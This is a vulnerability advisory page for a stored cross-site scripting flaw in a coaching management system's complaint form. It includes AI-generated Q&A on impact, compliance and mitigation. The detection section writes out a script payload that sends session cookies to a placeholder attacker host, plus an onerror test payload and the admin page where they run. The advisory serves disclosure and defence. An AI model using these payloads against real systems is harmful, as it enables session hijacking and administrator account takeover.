CVE-2026-7222
Cross-Site Scripting in Coaching Management System Complaint Form
Publication date: 2026-04-28
Last updated on: 2026-04-29
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| code-projects | coaching_management_system | 1.0 |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-79 | The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. |
| CWE-94 | The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. |
Attack-Flow Graph
AI Powered Q&A
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The CVE-2026-7222 vulnerability allows low-privileged users to execute arbitrary JavaScript in higher-privileged user contexts, leading to session hijacking and full administrative account takeover. This compromises the confidentiality, integrity, and availability of the application and its data.
Such a compromise can lead to unauthorized access to sensitive personal data, which may violate data protection regulations like GDPR and HIPAA that require strict controls to protect personal and health information.
Failure to properly sanitize inputs and secure session cookies increases the risk of data breaches, potentially resulting in non-compliance with these standards and associated legal and financial consequences.
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include sanitizing and validating all user inputs in the complaint submission and reply functionalities to prevent injection of malicious scripts.
Encode all outputs using functions like htmlspecialchars() in PHP to neutralize any injected scripts before rendering them in the browser.
Set the HttpOnly and Secure flags on session cookies to prevent client-side scripts from accessing session identifiers, reducing the risk of session hijacking.
Implement a Content Security Policy (CSP) to restrict the sources from which scripts can be executed, mitigating the impact of any injected scripts.
Can you explain this vulnerability to me?
CVE-2026-7222 is a stored Cross-Site Scripting (XSS) vulnerability found in the Coaching Management System, specifically in the complaint submission and reply functionalities.
The vulnerability arises because the system fails to properly sanitize user inputs in complaint submissions and replies, allowing malicious JavaScript code to be stored and later executed in the browsers of other users.
This means that low-privileged users, such as students, can inject malicious scripts that execute when viewed by higher-privileged users like admins or teachers, and vice versa.
The attack can be initiated remotely and involves injecting JavaScript payloads that can hijack sessions or perform other malicious actions.
How can this vulnerability impact me? :
This vulnerability can lead to serious security impacts including session hijacking and full administrative account takeover.
- Low-privileged users (students) can execute arbitrary JavaScript in admin contexts.
- Attackers can steal session cookies from admins or teachers, allowing them to hijack accounts.
- Admins or teachers can inject malicious scripts that execute in student sessions, enabling bidirectional attacks.
- The overall integrity, confidentiality, and availability of the application can be completely compromised.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by testing the complaint submission and reply functionalities for stored Cross-Site Scripting (XSS) issues. Specifically, injecting typical XSS payloads into the complaint form or reply fields and observing if the scripts execute when viewed by admins or students.
- Submit a complaint with a payload such as: <script>new Image().src = "http://ATTACKER-IP:PORT/?c=" + document.cookie;</script>
- Check if the payload executes when viewed by an admin at /modules/admin/incomingcomplaint.php.
- Reply to a complaint with a payload like: <img src=x onerror=alert(window.location)> and verify if it executes in the student session.
Network detection can include monitoring HTTP traffic for suspicious payloads or unexpected requests to attacker-controlled servers, such as requests containing session cookies exfiltrated via injected scripts.
No specific commands are provided in the resources, but manual testing with curl or browser-based tools to submit payloads and observe behavior is recommended.